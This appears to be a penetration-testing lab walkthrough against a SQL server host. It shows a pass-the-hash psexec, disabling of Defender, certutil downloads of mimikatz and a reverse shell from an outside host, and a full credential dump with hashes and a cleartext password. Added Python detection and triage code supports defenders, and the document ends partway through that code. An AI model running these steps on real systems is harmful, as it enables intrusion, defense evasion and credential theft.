proxychains4 impacket-mssqlclient tommy:[email protected] -port 1433 -windows-auth

┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ **proxychains4 impacket-mssqlclient tommy:[email protected] -port 1433 -windows-auth**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:1433  ...  OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL11\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL11\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> help

     lcd {path}                 - changes the current local directory to {path}
     exit                       - terminates the server process (and this session)
     enable_xp_cmdshell         - you know what it means
     disable_xp_cmdshell        - you know what it means
     xp_cmdshell {cmd}          - executes cmd using xp_cmdshell
     sp_start_job {cmd}         - executes cmd using the sql server agent (blind)
     ! {cmd}                    - executes a local shell cmd
     
SQL> **enable_xp_cmdshell
[-] ERROR(SQL11\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(SQL11\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(SQL11\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(SQL11\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.**
SQL>

proxychains4 crackmapexec smb 172.16.243.188 -u tommy -p '89dsfsji43A'

┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 crackmapexec smb 172.16.243.188 -u tommy -p '89dsfsji43A'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:135 <--socket error or timeout!
**SMB         172.16.243.188  445    SQL11            [*] Windows 10.0 Build 17763 (name:SQL11) (domain:final.com) (signing:False) (SMBv1:False)**
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
SMB         172.16.243.188  445    SQL11            [+] final.com\tommy:89dsfsji43A

Using the hash obtained from 172.16.243.187, connect with impacket-psexec:

**proxychains4 impacket-psexec -hashes :8388d07604009d14cbb78f7d37b9e887 [email protected]**
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[*] Requesting shares on 172.16.243.188.....
[*] Found writable share ADMIN$
[*] Uploading file BhsfFPme.exe
[*] Opening SVCManager on 172.16.243.188.....
[*] Creating service XHDh on 172.16.243.188.....
[*] Starting service XHDh.....
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
[!] Press help for extra shell commands
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.188:445  ...  OK
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> ipconfig          

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.243.188
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\Windows\system32> hostname
sql11

C:\Windows\system32> more c:\Users\Administrator\Desktop\proof.txt
c5cd6b2f7d31f8f4b392c49190ac864b

C:\Windows\system32> powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

c:\Windows\Tasks> certutil.exe -urlcache -f http://192.168.49.243/mimikatz.exe mimikatz.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Windows\Tasks> certutil.exe -urlcache -f http://192.168.49.243/revshell.exe revshell.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\Windows\Tasks> dir
 Volume in drive C has no label.
 Volume Serial Number is AE77-6F2A

 Directory of c:\Windows\Tasks

08/04/2022  02:17 AM    <DIR>          .
08/04/2022  02:17 AM    <DIR>          ..
08/04/2022  02:10 AM         1,234,696 mimikatz.exe
08/04/2022  02:17 AM             5,632 revshell.exe
               2 File(s)      1,240,328 bytes
               2 Dir(s)   6,156,959,744 bytes free

**c:\Windows\Tasks> revshell.exe**
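The psexec session above shows exactly what a defender can look for: a writable ADMIN$ share, an executable with a random name (BhsfFPme.exe) uploaded into it, and a service with a random four-letter name (XHDh) created and started. Every service install is logged in the System log as Event ID 7045, so those traits can be scored. The block below is an added example written for this write-up; it is not code from the page or from Impacket. The event lines are constructed samples in a simplified key=value rendering of 7045 fields (the key names are an assumption of this example, not the exact Windows field names), the scoring weights are this example's own heuristic, and nothing here is exported from a real host.

```python
"""Score service-install events (System log, Event ID 7045) for the trace the psexec
session above leaves: a randomly named executable dropped in ADMIN$ and registered as
a service with a random four-letter name (BhsfFPme.exe and XHDh in the session).
Added example for this write-up; not code from the page or from Impacket. The event
lines are constructed samples in a simplified key=value rendering, not exported events."""
import re
from typing import Dict, List, Optional, Tuple

_KV = re.compile(r'(\w+)=("([^"]*)"|\S+)')   # key=value, value optionally double-quoted

SAMPLE_EVENTS = [
    # constructed: the shape of the install seen above (4-letter service, 8-letter exe in ADMIN$)
    r'EventID=7045 Host=SQL11 ServiceName=XHDh ImagePath=%SystemRoot%\BhsfFPme.exe StartType="demand start"',
    # constructed: a legitimate install; note that sqlservr.exe also happens to be eight letters
    r'EventID=7045 Host=SQL11 ServiceName=MSSQL$SQLEXPRESS ImagePath="C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" StartType="auto start"',
    # constructed: a state change for the same service, not an install
    'EventID=7036 Host=SQL11 ServiceName=XHDh State=running',
]


def parse_event(line: str) -> Optional[Dict[str, str]]:
    """Parse one key=value line; returns None if the line is not an event record."""
    fields = {m.group(1): m.group(3) if m.group(3) is not None else m.group(2)
              for m in _KV.finditer(line)}
    return fields if 'EventID' in fields else None


def score_event(ev: Dict[str, str]) -> Tuple[int, List[str]]:
    """Add up independent indicators; any single one is common in benign installs."""
    if ev.get('EventID') != '7045':
        return 0, []
    score, reasons = 0, []
    name = ev.get('ServiceName', '')
    parts = re.split(r'[\\/]', ev.get('ImagePath', ''))
    binary, directory = parts[-1], '\\'.join(parts[:-1]).lower()
    if re.fullmatch(r'[A-Za-z]{4}', name):
        score += 2
        reasons.append(f'four-letter service name {name!r}')
    if re.fullmatch(r'[A-Za-z]{8}\.exe', binary):
        score += 2
        reasons.append(f'eight-letter binary name {binary!r}')
    if directory in ('%systemroot%', 'c:\\windows'):   # ADMIN$ maps to the Windows directory
        score += 1
        reasons.append('binary sits directly in the ADMIN$ root')
    if ev.get('StartType', '').lower().startswith('demand'):
        score += 1
        reasons.append('demand-start service (one-shot execution, not boot persistence)')
    return score, reasons


def find_psexec_like(lines: List[str], threshold: int = 3) -> List[Dict[str, object]]:
    """Return the installs whose combined score reaches the threshold."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev is None:
            continue
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append({'host': ev.get('Host'), 'service': ev.get('ServiceName'),
                         'score': score, 'reasons': reasons})
    return hits


if __name__ == '__main__':
    for hit in find_psexec_like(SAMPLE_EVENTS):
        print(hit)
```

The SQL Express sample is there on purpose: its binary name is eight letters, so it collects two points on one indicator and still stays under the threshold. Alerting on any single trait would page on every vendor installer; the combination of a random service name, a random binary name dropped in the share root and a demand-start type is what matches the session above.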

This gives a new reverse shell, which is more convenient to work with than the impacket-psexec one:

c:\Windows\Tasks>mimikatz.exe "sekurlsa::logonPasswords" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( [email protected] )
 ## \ / ##       > http://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( [email protected] )
  '#####'        > http://pingcastle.com / http://mysmartlogon.com   ***/

mimikatz(commandline) # sekurlsa::logonPasswords

Authentication Id : 0 ; 958035 (00000000:000e9e53)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SQL11
Logon Server      : SQL11
Logon Time        : 3/16/2022 5:29:29 PM
SID               : S-1-5-21-2852705690-387487691-3395496674-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SQL11
	 * NTLM     : 8388d07604009d14cbb78f7d37b9e887
	 * SHA1     : 6526b2fc55fcaa745a30e10065d5c44b0bac0b33
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : SQL11
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : SQL11
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 261067 (00000000:0003fbcb)
Session           : Interactive from 1
User Name         : tina
Domain            : FINAL
Logon Server      : DC01
Logon Time        : 3/16/2022 5:15:27 PM
SID               : S-1-5-21-1725955968-4040474791-670206374-1109
	msv :	
	 [00000003] Primary
	 * Username : tina
	 * Domain   : FINAL
	 * NTLM     : 1d4c153225b424290188504b9e0541eb
	 * SHA1     : 6ea7a37a1b5b943266cde1176d497e0044d69512
	 * DPAPI    : ea0e1bc1ff1c38a63033aa9e134b4fe4
	tspkg :	
	wdigest :	
	 * Username : tina
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : tina
	 * Domain   : FINAL.COM
	 * Password : df54ikosdfGFkoal
	ssp :	
	credman :	

Authentication Id : 0 ; 106255 (00000000:00019f0f)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 3/16/2022 5:15:03 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL11$
	 * Domain   : final.com
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 54206 (00000000:0000d3be)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:58 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : 749a0f74545e7a228bd4614a44b027e1
	 * SHA1     : 27ea897e4aaee4f58bbf6cc1f4534ec0d6cea28a
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL11$
	 * Domain   : final.com
	 * Password : 74 76 28 1d 32 31 ac 9f 76 a1 da fd 29 12 5f 4b d8 6f b1 f2 28 7a ff 05 df 96 1f 09 5f 07 36 ca 94 02 dc 0e 89 9a d9 15 9b c0 01 e3 f2 99 e7 d2 2f c4 60 c0 46 33 25 8b e6 cc 32 5d 73 eb 90 da b3 88 57 9d 1a 27 f7 62 f0 5e 32 63 45 f8 51 28 05 fd 54 52 43 2e 94 10 1e 70 bc 51 a0 ed f6 53 7c f6 54 df b3 76 3e 9d 69 1b 60 bf 39 95 04 24 b1 2d c9 8e 46 a6 59 85 b6 f8 cd 4d 3a 83 79 cd 97 01 23 c9 da e5 a8 7c 65 bf 11 cc fb d1 63 27 5c 22 87 53 e2 59 fe 17 94 79 52 00 8b cf ed 3a e6 68 f7 04 75 f3 93 59 ef 6a 87 c8 4a 6b 0e 33 47 ef 8e 86 d5 ba 95 95 55 22 42 ec 7a 8c 68 a6 02 d4 9a 01 a8 ee e1 b7 5e 53 ea fa a7 61 ad a3 5f 2b e4 c3 a6 af 3d 68 f7 b4 72 19 f5 15 7a b7 b0 f7 58 b7 e5 cc b2 1c b6 d8 2a 5d 57 12 ab 1c 
	ssp :	
	credman :	

Authentication Id : 0 ; 54148 (00000000:0000d384)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:58 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL11$
	 * Domain   : final.com
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SQL11$
Domain            : FINAL
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:57 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sql11$
	 * Domain   : FINAL.COM
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 35166 (00000000:0000895e)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:57 PM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL11$
	 * Domain   : final.com
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 35124 (00000000:00008934)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:57 PM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL11$
	 * Domain   : final.com
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

Authentication Id : 0 ; 1969021 (00000000:001e0b7d)
Session           : Service from 0
User Name         : sqlsvc11
Domain            : FINAL
Logon Server      : DC01
Logon Time        : 8/3/2022 11:59:13 PM
SID               : S-1-5-21-1725955968-4040474791-670206374-1114
	msv :	
	 [00000003] Primary
	 * Username : sqlsvc11
	 * Domain   : FINAL
	 * NTLM     : c0f6442ea39956aebf28219639ba9953
	 * SHA1     : f5acd579746e2d6ea8e2828ce43016eb6d1375f2
	 * DPAPI    : df3eded7cf4b7fea4bcec93057b9ab96
	tspkg :	
	wdigest :	
	 * Username : sqlsvc11
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sqlsvc11
	 * Domain   : FINAL.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 1076615 (00000000:00106d87)
Session           : Interactive from 0
User Name         : Administrator
Domain            : SQL11
Logon Server      : SQL11
Logon Time        : 8/3/2022 11:58:36 PM
SID               : S-1-5-21-2852705690-387487691-3395496674-500
	msv :	
	 [00000003] Primary
	 * Username : Administrator
	 * Domain   : SQL11
	 * NTLM     : 8388d07604009d14cbb78f7d37b9e887
	 * SHA1     : 6526b2fc55fcaa745a30e10065d5c44b0bac0b33
	tspkg :	
	wdigest :	
	 * Username : Administrator
	 * Domain   : SQL11
	 * Password : (null)
	kerberos :	
	 * Username : Administrator
	 * Domain   : SQL11
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 260775 (00000000:0003faa7)
Session           : Interactive from 1
**User Name         : tina
Domain            : FINAL
Logon Server      : DC01**
Logon Time        : 3/16/2022 5:15:27 PM
**SID               : S-1-5-21-1725955968-4040474791-670206374-1109**
	msv :	
	 [00000003] Primary
	 * Username : tina
	 * Domain   : FINAL
	 * NTLM     : **1d4c153225b424290188504b9e0541eb**
	 * SHA1     : 6ea7a37a1b5b943266cde1176d497e0044d69512
	 * DPAPI    : ea0e1bc1ff1c38a63033aa9e134b4fe4
	tspkg :	
	wdigest :	
	 * Username : tina
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : tina
	 * Domain   : FINAL.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:59 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 33868 (00000000:0000844c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:56 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : SQL11$
	 * Domain   : FINAL
	 * NTLM     : d218ba4449ccace7ecfa7f21440f42c6
	 * SHA1     : 7cb17f9fe3620ca8594301a73a0076485f0e3a7b
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SQL11$
Domain            : FINAL
Logon Server      : (null)
Logon Time        : 3/16/2022 5:14:56 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : SQL11$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sql11$
	 * Domain   : FINAL.COM
	 * Password : c2 9c 23 bf cc d8 91 35 ed a5 66 19 ee d1 bf 2e 74 70 22 1d ad 5b ca ff 9f 11 73 4e 18 bd b3 26 a2 86 29 20 cc 08 40 e6 c9 b9 39 1b 02 4d 65 e8 63 cd 73 d6 f7 7c 7f 55 aa b4 bc 61 97 9a 5b fd 13 7c 69 95 76 f7 8b bf b0 8a 51 eb 59 dd a2 98 90 ad 25 d2 17 ba e6 f4 89 dd b2 d2 42 f7 46 56 0b dc 33 4f cb 07 5f 78 6e 5e 99 01 06 f7 ed f4 06 28 9a fb d7 a0 ae 00 8c 95 42 07 75 ca e9 08 09 16 06 22 ad 4e ba 2a 04 65 57 c4 5e a9 85 a7 f2 48 ce c4 b4 5c 6c d4 20 b2 15 4a e1 67 7b 9f fc fa 99 c9 be 27 3d f9 d0 23 e3 21 6d b5 58 57 42 5e 7b aa e4 81 2e 52 b2 e5 40 a6 26 8a 11 c9 c3 32 04 4f 84 ef 4c e0 a8 d4 f4 a1 4b 83 6a 7a f6 c4 e7 23 ae 1e 01 06 6e ad ae e2 a1 b1 d3 34 98 e8 cb 28 67 15 9c ff 45 2f 4a a2 0f 84 91 96 
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!
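The dump above is long, and the question a responder has to answer from it is short: which principals had secrets sitting in LSASS on SQL11, and in which form. The local Administrator appears only as an NTLM hash, tina appears with both a hash and a Kerberos cleartext password (the same value later shows up as the DefaultPassword LSA secret), and the SQL11$ computer account appears with a long hex key blob rather than a typed password. The block below is an added example written for this write-up, not code from the page or from mimikatz: it parses the text layout printed above and turns it into a rotation list. SAMPLE is a constructed dump in that layout with made-up hashes and passwords (none of the values above are reused), and the severity ordering is this example's own triage rule.

```python
"""Turn a mimikatz sekurlsa::logonPasswords dump into a credential-rotation list.
Added example for this write-up; not code from the page or from mimikatz. It parses
the text layout shown above (one 'Authentication Id' block per logon session, then
provider sections such as msv, wdigest, kerberos). SAMPLE is constructed in that
layout with made-up hashes and passwords."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

SAMPLE = """\
Authentication Id : 0 ; 1 (00000000:00000001)
User Name         : Administrator
    msv :
     [00000003] Primary
     * Username : Administrator
     * Domain   : SQL11
     * NTLM     : 0123456789abcdef0123456789abcdef

Authentication Id : 0 ; 2 (00000000:00000002)
User Name         : tina
    msv :
     * Username : tina
     * Domain   : FINAL
     * NTLM     : fedcba9876543210fedcba9876543210
    kerberos :
     * Username : tina
     * Domain   : FINAL.COM
     * Password : Example-Cleartext-1

Authentication Id : 0 ; 3 (00000000:00000003)
User Name         : SQL11$
    msv :
     * Username : SQL11$
     * Domain   : FINAL
     * NTLM     : 00112233445566778899aabbccddeeff
    kerberos :
     * Username : sql11$
     * Domain   : final.com
     * Password : 00 11 22 33 44 55 66 77 88 99 aa bb cc dd ee ff 00 11 22 33
"""
PROVIDER = re.compile(r'(msv|tspkg|wdigest|kerberos|ssp|credman)\s*:')
FIELD = re.compile(r'\* (Username|Domain|NTLM|Password)\s*:\s*(.*)')


@dataclass
class Exposure:
    principal: str                                   # DOMAIN\user, normalised
    ntlm: Set[str] = field(default_factory=set)
    cleartext: Set[str] = field(default_factory=set)
    key_blob: bool = False    # long hex blob = machine-account key material, not a typed password


def is_hex_blob(value: str) -> bool:
    tokens = value.split()
    return len(tokens) >= 16 and all(re.fullmatch(r'[0-9a-fA-F]{2}', t) for t in tokens)


def parse_logon_passwords(text: str) -> Dict[str, Exposure]:
    exposures: Dict[str, Exposure] = {}

    def record(provider, fl):                        # close one provider section
        user, dom = fl.get('Username', '(null)'), fl.get('Domain', '(null)')
        if provider is None or '(null)' in (user, dom):
            return
        key = f"{dom.split('.')[0].upper()}\\{user.lower()}"   # FINAL / FINAL.COM / final.com -> FINAL
        exp = exposures.setdefault(key, Exposure(key))
        if re.fullmatch(r'[0-9a-fA-F]{32}', fl.get('NTLM', '')):
            exp.ntlm.add(fl['NTLM'].lower())
        pw = fl.get('Password', '(null)')
        if pw != '(null)':
            if is_hex_blob(pw):
                exp.key_blob = True
            else:
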